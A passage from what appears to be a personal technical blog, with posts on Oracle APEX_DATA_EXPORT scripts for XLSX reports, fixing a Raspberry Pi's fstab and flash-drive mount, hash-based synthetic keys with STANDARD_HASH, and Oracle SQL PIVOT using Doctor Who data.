open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
v_stmnt := 'select * from departments';
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'whatever' -- any string will do !
);
-- Create the query context...
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- ...and export the data into the v_export object
-- this time use the default - i.e. export to a BLOB, rather than a CLOB
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx -- XLSX
);
apex_exec.close( v_context);
dbms_output.put_line('Writing file');
-- Now write the blob out to an xlsx file
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
As you can see, this script is quite similar to the csv version. The main differences are that, firstly, we’re saving the output as a BLOB rather than a CLOB, simply by not overriding the default behaviour when calling APEX_DATA_EXPORT.EXPORT.
Secondly, we’re writing the result out to a file.
Once we retrieve the file and open it, we can see that indeed, it is in xlsx format :
As well as generating a vanilla spreadsheet, APEX_DATA_EXPORT does have a few more tricks up it’s sleeve…
Adding an AggregationWe can add a row count to the bottom of our report by means of the ADD_AGGREGATE procedure.
To do so, we need to modify the report query to produce the data to be used by the aggregate :
select department_id, department_name, manager_id, location_id,
count( 1) over() as record_count
from departments';
As we don’t want to list the record count on every row, we need to exclude the record_count column from the result set by specifying the columns that we do actually want in the output. We can do this with calls to the ADD_COLUMN procedure :
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
NOTE – column names passed in the P_NAME parameter in this procedure need to be in UPPERCASE.
Finally, we need to specify an aggregate itself using the ADD_AGGREGATE procedure :
apex_data_export.add_aggregate
(
p_aggregates => v_aggregates,
p_label => 'Data Row Count',
p_display_column => 'DEPARTMENT_ID',
p_value_column => 'RECORD_COUNT'
);
The finished script is called excel_aggregate.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_columns apex_data_export.t_columns;
v_aggregates apex_data_export.t_aggregates;
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'aggregate.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
-- We only need the first record returned by this cursor
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
-- Add a row with a count of the records in the file
-- We need to add the relevant data to the query and then format it
v_stmnt :=
'select department_id, department_name, manager_id, location_id,
count( 1) over() as record_count
from departments';
-- Make sure only the data columns to display on the report, not the record_count
-- NOTE - in all of these procs, column names need to be passed as upper case literals
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'DEPARTMENT_NAME');
apex_data_export.add_column( p_columns => v_columns, p_name => 'MANAGER_ID');
apex_data_export.add_column( p_columns => v_columns, p_name => 'LOCATION_ID');
apex_data_export.add_aggregate
(
p_aggregates => v_aggregates,
p_label => 'Data Row Count',
p_display_column => 'DEPARTMENT_ID',
p_value_column => 'RECORD_COUNT'
);
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx, -- XLSX
p_columns => v_columns,
p_aggregates => v_aggregates
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
When we run this, we now get a row count row at the bottom of the file :
Highlighting cells and rowsThe ADD_HIGHLIGHT procedure allows us to apply conditional formatting to individual cells, or even entire rows.
Once again the values to determine this behaviour need to be included in the report query.
In this case, we specify a highlight_id value to be used in rendering the row.
This time, I have a new query and I want to apply formatting based on the value of the SALARY column.
If the value is below 6000 then I want to make the text red ( by applying highlighter_id 1).
Otherwise, I want to set the background colour to green for the entire row ( highlighter_id 2).
The query therefore is this :
select first_name, last_name, salary,
case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG'
Highlight 1 is :
-- text in red for id 1
apex_data_export.add_highlight(
p_highlights => v_highlights,
p_id => 1,
p_value_column => 'FAIR_PAY',
p_display_column => 'SALARY',
p_text_color => '#FF0000' );
…and highlight 2 is :
-- Whole row with green background for id 2
apex_data_export.add_highlight
(
p_highlights => v_highlights,
p_id => 2,
p_value_column => 'FAIR_PAY',
p_text_color => '#000000', -- black
p_background_color => '#00ffbf' -- green
);
The finished script is excel_highlight.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_highlights apex_data_export.t_highlights;
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'programmer_pay.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
-- Add a row with a count of the records in the file
-- We need to add the relevant data to the query and then format it
v_stmnt :=
q'[select first_name, last_name, salary,
case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG']';
-- text in red for id 1
apex_data_export.add_highlight(
p_highlights => v_highlights,
p_id => 1,
p_value_column => 'FAIR_PAY',
p_display_column => 'SALARY',
p_text_color => '#FF0000' );
-- Whole row with green background for id 2
apex_data_export.add_highlight
(
p_highlights => v_highlights,
p_id => 2,
p_value_column => 'FAIR_PAY',
p_text_color => '#000000', -- black
p_background_color => '#00ffbf' -- green
);
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- Pass the highlights object into the export
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx,
p_highlights => v_highlights
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
…and the output…
Formatting with GET_PRINT_CONFIGThe GET_PRINT_CONFIG function offers a plethora of document formatting options…and a chance for me to demonstrate that I’m really more of a back-end dev.
To demonstrate just some of the available options, I have :
- changed the header and body font family to Times (default is Helvetica)
- set the heading text to be White and bold
- set the header background to be Dark Gray ( or Grey, if you prefer)
- set the body background to be Turquoise
- set the body font colour to be Midnight Blue
All of which looks like this :
v_print_config := apex_data_export.get_print_config
(
p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
p_header_font_weight => apex_data_export.c_font_weight_bold, -- Default is "normal"
p_header_font_color => '#FFFFFF', -- White
p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
p_body_font_family => apex_data_export.c_font_family_times,
p_body_bg_color => '#40E0D0', -- Turquoise
p_body_font_color => '#191970' -- MidnightBlue
);
Note that, according to the documentation, GET_PRINT_CONFIG will also accept HTML colour names or RGB codes.
Anyway, the script is called excel_print_config.sql :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_print_config apex_data_export.t_print_config;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'crayons.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike'
);
v_stmnt := 'select * from departments';
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
-- Let's do some formatting.
-- OK, let's just scribble with the coloured crayons...
v_print_config := apex_data_export.get_print_config
(
p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
p_header_font_weight => apex_data_export.c_font_weight_bold, -- Default is "normal"
p_header_font_color => '#FFFFFF', -- White
p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
p_body_font_family => apex_data_export.c_font_family_times,
p_body_bg_color => '#40E0D0', -- Turquoise
p_body_font_color => '#191970' -- MidnightBlue
);
-- Specify the print_config in the export
v_export := apex_data_export.export
(
p_context => v_context,
p_format => apex_data_export.c_format_xlsx,
p_print_config => v_print_config
);
apex_exec.close( v_context);
v_length := dbms_lob.getlength( v_export.content_blob);
v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
while v_pos <= v_length loop
dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
utl_file.put_raw(v_fh, v_buffer, true);
v_pos := v_pos + v_amount;
end loop;
utl_file.fclose( v_fh);
dbms_output.put_line('File written to HR_REPORTS');
exception when others then
dbms_output.put_line(sqlerrm);
if utl_file.is_open( v_fh) then
utl_file.fclose(v_fh);
end if;
end;
/
…and the resulting file is about as garish as you’d expect…
On the off-chance that you might prefer a more subtle colour scheme, you can find a list of HTML colour codes here.
Pi-Eyed and Clueless – Adventures with Board and Flash Drive
Since setting up my Raspberry Pi as a Plex Media Server a few years ago, the reliable application of Moore’s Law has brought us to a point where a humble USB flash drive now has sufficient capacity to cope with all of my media files and then some.
Therefore, I felt it was probably time to retire the powered external HDD that had been doing service as storage and replace it with a nice, compact stick.
The Pi in question is a Pi3 and is running Raspbian 11 (Bullseye).
The main consideration here was that I wanted to ensure that the new storage was visible to Plex from the same location as before so that I didn’t have to go through the rigmarole of validating and correcting all of the metadata that Plex retrieves for each media file ( Movie details etc).
Having copied the relevant files from the HDD to the new Flash Drive, I was ready to perform this “simple” admin task.
The steps to accomplish this are set out below.
Also detailed are some of the issues I ran into and how I managed to solve them, just in case you’ve stumbled across this post in a desparate search for a solution to your beloved fruit-based computer having turned into a slice of Brick Pi. In fact, let’s start with…
Pi not booting after editing /etc/fstabOn one occasion, after editing the fstab file and rebooting, I found the Pi unresponsive.
Having connected a display and keyboard to the Pi and starting it again, I was greeted with the message :
"You are in emergency mode. After logging in, type "journalctl -xb" to view system logs, "systemctl reboot to reboot, "systemctl default" or ^D to try again to boot into the default mode.
Press Enter to continue
…and after pressing enter…
"Cannot open access to console, the root accoutn is locked.
See sulogin(8) man page for more details.
Press Enter to continue...
…after which pressing Enter seems to have little effect.
According to this Stack Exchange thread, one solution would be to remove the SD card from the Pi, mount it on a suitable filesystem on alternative hardware ( e.g. a laptop) and edit the /etc/fstab file to remove the offending entry.
I took the other route…
Start by Rebooting and hold down the [Shift] key so that Raspbian takes you to the Noobs screen.
Now, from the top menu, select Edit config. This opens an editor with two tabs – config and cmdline.txt
We want to edit the cmdline.txt so click on that tab.
Despite appearances, this file is all on a single line so when you append to it, you need to add a space at the start and not a newline. To persuade Raspbian to give us access to a command prompt, we need to append :
init=/bin/sh
Now, save the file then choose Exit (Esc) from the NOOBS menu so that the Pi continues to boot.
You should now be resarded with a ‘#’ prompt.
At this point, the filesystem is mounted but is read only. As we want to fix the issue by editing (i.e. writing to) the /etc/fstab file, we need to remount it in read/write mode. We can do this by typing the following at the prompt :
mount -n -o remount,rw /
Now, finally, I can use nano to remove the offending entry from /etc/fstab
nano /etc/fstab
At this point, you have the option of editing the cmdline.txt so that the Pi starts normally, by editing the file :
nano /boot/cmdline.txt
Alternatively, you may prefer to let the Pi restart and hold down [SHIFT] and do the edit in the NOOBs screen.
You would then exit NOOBS and the Pi should boot normally.
Either way, we can reboot by typing :
reboot
…at the prompt.
Hopefully, you won’t need to go through any of this pain as what follows did work as expected…
Unmounting the old driveFirst of all, we need to identify the device :
sudo fdisk -l |grep /dev/sda
In my case, there’s just one device – /dev/sda1.
Now I need to unmount it :
umount /dev/sda1
We then need to ensure that it isn’t mounted next time we boot
to do this, we need to edit /etc/fstab and comment out the appropriate entry :
sudo nano /etc/fstab
Rather than deleting it altogether, I’ve just commented it out the relevant line, in case I need to put it back for any reason :
# Below is entry for Seagate external HDD via a powered USB Hub
#UUID=68AE9F66AE9F2C16 /mnt/usbstorage ntfs nofail,uid=pi,gid=pi 0 0
In order to make sure that this has all worked as expected, I physically disconnect the external HDD from the pi and restart it with
sudo reboot
The correct way to mount a Flash Drive
Well, these days the simplest way to mount the drive is just to plug it in to one of the USB ports on the Pi. Raspbian then automagically mounts it to :
/media/pi
Initially, I thought I’d try to simply create a symbolic link under the now empty mount point where the external HDD used to live :
ln -s ../../media/pi/SanDisk/Media /mnt/usbstorage
…and then restart the Plex Server…
sudo service plexmediaserver stop
sudo service plexmediaserver start
Unfortunately, whilst we don’t get any errors on the command line, the Plex itself refuses to read the link and insisted that all of the media files under /mnt/usbstorage are “Unavailable”.
Therefore, we need to do things properly and explicitly mount the Flash Drive to the desired mount point.
First of all, we need to confirm the type of filesystem on the drive we want to mount.
Whilst fdisk gives us the device name, it seems to be hedging it’s bets as regards the filesystem type :
sudo fdisk -l |grep /dev/sda
Disk /dev/sda: 466.3 GiB, 500648902656 bytes, 977829888 sectors
/dev/sda1 7552 977829887 977822336 466.3G 7 HPFS/NTFS/exFAT
Fortunately, there’s a more reliable way to confirm the type, which gives as the UUID for the Flash Drive as well…
sudo blkid /dev/sda1
/dev/sda1: LABEL="SanDisk" UUID="8AF9-909A" TYPE="exfat" PARTUUID="c3072e18-01"
The type of the old external HDD was NTFS, so it’s likely I’ll need to download some packages to add exFat support on the pi :
sudo apt install exfat-fuse
sudo apt install exfat-utils
Once apt has done it’s thing and these packages are installed, we can then add an entry to fstab to mount the Flash Drive on the required directory every time the Pi starts :
sudo nano /etc/fstab
The line we need to add is in the format:
UUID=<flash drive UUID> <mount point> <file system type> <options> 0 0
The options I’ve chosen to specify are :
- defaults – use the default options rw, suid, dev, exec, auto, nouser and async
- users – Allow any user to mount and to unmount the filesystem, even when some other ordinary user mounted it.
- nofail – do not report errors for this device if it does not exist
- 0 – exclude from any system backup
- 0 – do not indluce this device in fsck check
So, my new entry is :
UUID=8AF9-909A /mnt/usbstorage exfat defaults,users,nofail 0 0
Once these changes are saved, we can check that the command will work :
unmount /dev/sda1
mount -a
If you don’t get any feedback from this command, it’s an indication that it worked as expected.
You should now be able to see the file system on the flash drive under /mnt/usbstorage :
ls -l /mnt/usbstorage/
total 2816
-rwxr-xr-x 1 root root 552605 Sep 23 2021 Install SanDisk Software.dmg
-rwxr-xr-x 1 root root 707152 Sep 23 2021 Install SanDisk Software.exe
drwxr-xr-x 5 root root 262144 Dec 31 16:19 Media
drwxr-xr-x 3 root root 262144 Apr 10 2018 other_plex_metadata
drwxr-xr-x 6 root root 262144 Mar 11 2017 Photos
-rwxr-xr-x 1 root root 300509 Sep 23 2021 SanDisk Software.pdf
One final step – reboot the pi once more to ensure that your mount is permanent.
With that done, I should be able to continue enjoying my media server, but with substantially less hardware.
ReferencesThere are a couple of sites that may be of interest :
There is an explanation of the fstab options here.
You can find further details on the cmdline.txt file here.
Using STANDARD_HASH to generate synthetic key values
In Oracle, identity columns are a perfect way of generating a synthetic key value as the underlying sequence will automatically provide you with a unique value every time it’s invoked, pretty much forever.
One minor disadvantage of sequence generated key values is that you cannot predict what they will be ahead of time.
This may be a bit of an issue if you need to provide traceability between an aggregated record and it’s component records, or if you want to update an existing aggregation in a table without recalculating it from scratch.
In such circumstances you may find yourself needing to write the key value back to the component records after generating the aggregation.
Even leaving aside the additional coding effort required, the write-back process may be quite time consuming.
This being the case, you may wish to consider an alternative to the sequence generated key value and instead, use a hashing algorithm to generate a unique key before creating the aggregation.
That’s your skeptical face.
You’re clearly going to take some convincing that this isn’t a completely bonkers idea.
Well, if you can bear with me, I’ll explain.
Specifically, what I’ll look at is :
- using the STANDARD_HASH function to generate a unique key
- the chances of the same hash being generated for different values
- before you rush out to buy a lottery ticket ( part one) – null values
- before you rush out to buy a lottery ticket (part two) – date formats
- before you rush out to buy a lottery ticket (part three) – synching the hash function inputs with the aggregation’s group by
- a comparison between the Hashing methods that can be used with STANDARD_HASH
Just before we dive in, I should mention Dani Schnider’s comprehensive article on this topic, which you can find here.
Example TableI have a table called DISCWORLD_BOOKS_STAGE – a staging table that currently contains :
select *
from discworld_books_stage;
TITLE PAGES SUB_SERIES YOUNG_ADULT_FLAG
---------------------- ---------- ---------------------- ----------------
The Wee Free Men 404 TIFFANY ACHING Y
Monstrous Regiment 464 OTHER
A Hat Full of Sky 298 TIFFANY ACHING Y
Going Postal 483 INDUSTRIAL REVOLUTION
Thud 464 THE WATCH
Wintersmith 388 TIFFANY ACHING Y
Making Money 468 INDUSTRIAL REVOLUTION
Unseen Academicals 533 WIZARDS
I Shall Wear Midnight 434 TIFFANY ACHING Y
Snuff 370 THE WATCH
Raising Steam 372 INDUSTRIAL REVOLUTION
The Shepherd's Crown 338 TIFFANY ACHING Y
I want to aggregate a count of the books and total number of pages by Sub-Series and whether the book is a Young Adult title and persist it in a new table, which I’ll be updating periodically as new data arrives.
Using the STANDARD_HASH function, I can generate a unique value for each distinct sub_series, young_adult_flag value combination by running :
select
standard_hash(sub_series||'#'||young_adult_flag||'#') as cid,
sub_series,
young_adult_flag,
sum(pages) as total_pages,
count(title) as number_of_books
from discworld_books_stage
group by sub_series, young_adult_flag
order by 1
/
CID SUB_SERIES YA TOTAL_PAGES NO_BOOKS
---------------------------------------- ------------------------- -- ----------- ----------
08B0E5ECC3FD0CDE6732A9DBDE6FF2081B25DBE2 WIZARDS 533 1
8C5A3FA1D2C0D9ED7623C9F8CD5F347734F7F39E INDUSTRIAL REVOLUTION 1323 3
A7EFADC5EB4F1C56CB6128988F4F25D93FF03C4D OTHER 464 1
C66E780A8783464E89D674733EC16EB30A85F5C2 THE WATCH 834 2
CE0E74B86FEED1D00ADCAFF0DB6DFB8BB2B3BFC6 TIFFANY ACHING Y 1862 5
OK, so we’ve managed to get unique values across a whole seven rows. But, lets face it, generating a synthetic key value in this way does introduce the risk of a duplicate hash being generated for multiple unique records.
As for how much of a risk…
Odds on a collisionIn hash terms, generating the same value for two different inputs is known as a collision.
The odds on this happening for each of the methods usable with STANDARD_HASH are :
MethodCollision OddsMD52^64SHA12^80SHA2562^128SHA3842^192SHA5122^256Figures taken from https://en.wikipedia.org/wiki/Hash_function_security_summaryBy default, STANDARD_HASH uses SHA1. The odds of a SHA1 collision are :
1 in 1,208,925,819,614,629,174,706,176
By comparison, winning the UK Lottery Main Draw is pretty much nailed on at odds of
1 in 45,057,474
So, if you do happen to come a cropper on that 12 octillion ( yes, that’s really a number)-to-one chance then your next move may well be to run out and by a lottery ticket.
Before you do, however, it’s worth checking to see that you haven’t fallen over one or more of the following…
Remember that the first argument we pass in to the STANDARD_HASH function is a concatenation of values.
If we have two nullable columns together we may get the same concatenated output where one of the values is null :
with nulltest as (
select 1 as id, 'Y' as flag1, null as flag2 from dual union all
select 2, null, 'Y' from dual
)
select id, flag1, flag2,
flag1||flag2 as input_string,
standard_hash(flag1||flag2) as hash_val
from nulltest
/
ID F F INPUT_STRING HASH_VAL
---------- - - ------------ ----------------------------------------
1 Y Y 23EB4D3F4155395A74E9D534F97FF4C1908F5AAC
2 Y Y 23EB4D3F4155395A74E9D534F97FF4C1908F5AAC
To resolve this, you can use the NVL function on each column in the concatenated input to the STANDARD_HASH function.
However, this is likely to involve a lot of typing if you have a large number of columns.
Instead, you may prefer to simply concatenate a single character after each column:
with nulltest as (
select 1 as id, 'Y' as flag1, null as flag2 from dual union all
select 2, null, 'Y' from dual
)
select id, flag1, flag2,
flag1||'#'||flag2||'#' as input_string,
standard_hash(flag1||'#'||flag2||'#') as hash_val
from nulltest
/
ID F F INPUT_STRING HASH_VAL
---------- - - ------------ ----------------------------------------
1 Y Y## 2AABF2E3177E9A5EFBD3F65FCFD8F61C3C355D67
2 Y #Y# F84852DE6DC29715832470A40B63AA4E35D332D1
Whilst concatenating a character into the input string does solve the null issue, it does mean we also need to consider…
Date FormatsIf you just pass a date into STANDARD_HASH, it doesn’t care about the date format :
select
sys_context('userenv', 'nls_date_format') as session_format,
standard_hash(trunc(sysdate))
from dual;
SESSION_FORMAT STANDARD_HASH(TRUNC(SYSDATE))
-------------- ----------------------------------------
DD-MON-YYYY 9A2EDB0D5A3D69D6D60D6A93E04535931743EC1A
alter session set nls_date_format = 'YYYY-MM-DD';
select
sys_context('userenv', 'nls_date_format') as session_format,
standard_hash(trunc(sysdate))
from dual;
SESSION_FORMAT STANDARD_HASH(TRUNC(SYSDATE))
-------------- ----------------------------------------
YYYY-MM-DD 9A2EDB0D5A3D69D6D60D6A93E04535931743EC1A
However, if the date is part of a concatenated value, the NLS_DATE_FORMAT will affect the output value as the date is implicitly converted to a string…
alter session set nls_date_format = 'DD-MON-YYYY';
Session altered.
select standard_hash(trunc(sysdate)||'XYZ') from dual;
STANDARD_HASH(TRUNC(SYSDATE)||'XYZ')
----------------------------------------
DF0A192333BDF860AAB338C66D9AADC98CC2BA67
alter session set nls_date_format = 'YYYY-MM-DD';
Session altered.
select standard_hash(trunc(sysdate)||'XYZ') from dual;
STANDARD_HASH(TRUNC(SYSDATE)||'XYZ')
----------------------------------------
FC2999F8249B89FE88D4C0394CC114A85DAFBBEF
Therefore, it’s probably a good idea to explicitly set the NLS_DATE_FORMAT in the session before generating the hash.
Use the same columns in the STANDARD_HASH as you do in the GROUP BYI have another table called DISCWORLD_BOOKS :
select sub_series, main_character
from discworld_books
where sub_series = 'DEATH';
SUB_SERIES MAIN_CHARACTER
-------------------- ------------------------------
DEATH MORT
DEATH DEATH
DEATH DEATH
DEATH SUSAN STO HELIT
DEATH LU TZE
If I group by SUB_SERIES and MAIN_CHARACTER, I need to ensure that I include those columns as input into the STANDARD_HASH function.
Otherwise, I’ll get the same hash value for different groups.
For example, running this will give us the same hash for each aggregated row in the result set :
select
sub_series,
main_character,
count(*),
standard_hash(sub_series||'#') as cid
from discworld_books
where sub_series = 'DEATH'
group by sub_series, main_character,
standard_hash(sub_series||main_character)
order by 1
/
SUB_SERIES MAIN_CHARACTER COUNT(*) CID
-------------------- ------------------------------ ---------- ----------------------------------------
DEATH MORT 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH DEATH 2 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH LU TZE 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
DEATH SUSAN STO HELIT 1 5539A1C5554935057E60CBD021FBFCD76CB2EB93
What we’re actually looking for is :
select
sub_series,
main_character,
count(*),
standard_hash(sub_series||'#'||main_character||'#') as cid
from discworld_books
where sub_series = 'DEATH'
group by sub_series, main_character,
standard_hash(sub_series||main_character)
order by 1
/
SUB_SERIES MAIN_CHARACTER COUNT(*) CID
-------------------- ---------------------- -------- ----------------------------------------
DEATH MORT 1 01EF7E9D4032CFCD901BB2A5A3E2A3CD6A09CC18
DEATH DEATH 2 167A14D874EA960F6DB7C2989A3E9DE07FAF5872
DEATH LU TZE 1 5B933A07FEB85D6F210825F9FC53F291FB1FF1AA
DEATH SUSAN STO HELIT 1 0DA3C5B55F4C346DFD3EBC9935CB43A35933B0C7
We’re going to populate this table :
create table discworld_subseries_aggregation
(
cid varchar2(128),
sub_series varchar2(50),
young_adult_flag varchar2(1),
number_of_books number,
total_pages number
)
/
…with the current contents of the DISCWORLD_BOOKS_STAGE table from earlier. We’ll then cleardown the staging table, populate it with a new set of data and then merge it into this aggregation table.
alter session set nls_date_format = 'DD-MON-YYYY';
merge into discworld_subseries_aggregation agg
using
(
select
cast(standard_hash(sub_series||'#'||young_adult_flag||'#') as varchar2(128)) as cid,
sub_series,
young_adult_flag,
count(title) as number_of_books,
sum(pages) as total_pages
from discworld_books_stage
group by sub_series, young_adult_flag
) stg
on ( agg.cid = stg.cid)
when matched then update
set agg.number_of_books = agg.number_of_books + stg.number_of_books,
agg.total_pages = agg.total_pages + stg.total_pages
when not matched then insert ( cid, sub_series, young_adult_flag, number_of_books, total_pages)
values( stg.cid, stg.sub_series, stg.young_adult_flag, stg.number_of_books, stg.total_pages)
/
commit;
truncate table discworld_books_stage;
Once we’re run this, the conents of DISCWORLD_SUBSERIES_AGGREGATION is :
Next, we insert the rest of the Discworld books into the staging table :
And run the merge again :
alter session set nls_date_format = 'DD-MON-YYYY';
merge into discworld_subseries_aggregation agg
using
(
select
cast(standard_hash(sub_series||'#'||young_adult_flag||'#') as varchar2(128)) as cid,
sub_series,
young_adult_flag,
count(title) as number_of_books,
sum(pages) as total_pages
from discworld_books_stage
group by sub_series, young_adult_flag
) stg
on ( agg.cid = stg.cid)
when matched then update
set agg.number_of_books = agg.number_of_books + stg.number_of_books,
agg.total_pages = agg.total_pages + stg.total_pages
when not matched then insert ( cid, sub_series, young_adult_flag, number_of_books, total_pages)
values( stg.cid, stg.sub_series, stg.young_adult_flag, stg.number_of_books, stg.total_pages)
/
7 rows merged.
Whilst you may consider the default SHA1 method perfectly adequate for generating unique values, it may be of interest to examine the relative performance of the other available hashing algorithms.
For what it’s worth, my tests on an OCI Free Tier 19c instance using the following script were not that conclusive :
with hashes as
(
select rownum as id, standard_hash( rownum, 'MD5' ) as hash_val
from dual
connect by rownum <= 1000000
)
select hash_val, count(*)
from hashes
group by hash_val
having count(*) > 1
/
Running this twice for each method,replacing ‘MD5’ with each of the available algorithms in turn :
MethodBest Runtime (secs)MD50.939SHA11.263SHA2562.223SHA3842.225SHA5122.280I would imagine that, among other things, performance may be affected by the length of the input expression to the function.
Dr Who and Oracle SQL Pivot
Dr Who recently celebrated it’s 60th Anniversary and the BBC marked the occasion by making all episodes since 1963 available to stream.
This has given me the opportunity to relive those happy childhood Saturday afternoons spent cowering behind the sofa watching Tom Baker
take on the most fiendish adversaries that the Costume department could conjure up in the days before CGI.
Like the Doctor, I too am I time traveller. OK, so I can only move forwards through time, but I do have some knowledge of the future.
For example, present me knows that future me is an idiot who will undoubtedly forget of the syntax for the Pivot command in Oracle SQL
next time he wants to pivot some VARCHAR2 columns.
So if you are future me, this is for you. You owe me a drink…
I have a simple table :
create table doctor_who
(
incarnation varchar2(50),
actor varchar2(100)
)
/
which I’ve populated with the following records :
select incarnation, actor
from doctor_who;
INCARNATION ACTOR
-------------------- ------------------------------
1st William Hartnell
2nd Patrick Troughton
3rd Jon Pertwee
4th Tom Baker
5th Peter Davison
6th Colin Baker
7th Sylvester McCoy
8th Paul McGann
9th Christopher Eccleston
10th David Tennant
11th Matt Smith
12th Peter Capaldi
13th Jodie Whittaker
14th David Tennant
15th Ncuti Gatwa
Fugitive Doctor Jo Martin
War Doctor John Hurt
17 rows selected.
If I want a query to return a single row which lists selected incarnations, I can do this :
select *
from
(
select
incarnation,
actor
from doctor_who
)
pivot
(
max(actor)
for incarnation in
(
'1st' as first,
'4th' as fourth,
'10th' as tenth,
'War Doctor' as war,
'Fugitive Doctor' as fugitive
)
)
/
Which returns :
FIRST FOURTH TENTH WAR FUGITIVE
------------- ----------- --------------- ------------- -------------------
William Hartnell Tom Baker David Tennant John Hurt Jo Martin
The first thing to notice here is that the PIVOT clause insists on an aggregate function for the column that holds the data you want to display.
Failure to use one results in :
ORA-56902: expect aggregate function inside pivot operation
Fortunately, the MAX function works happily with VARCHAR2 and doesn’t impact the data in ACTOR, because there’s only one value for each incarnation in our example.
Unsurprisingly, the subquery needs to include both the columns to pivot and those containing the values we want to display.
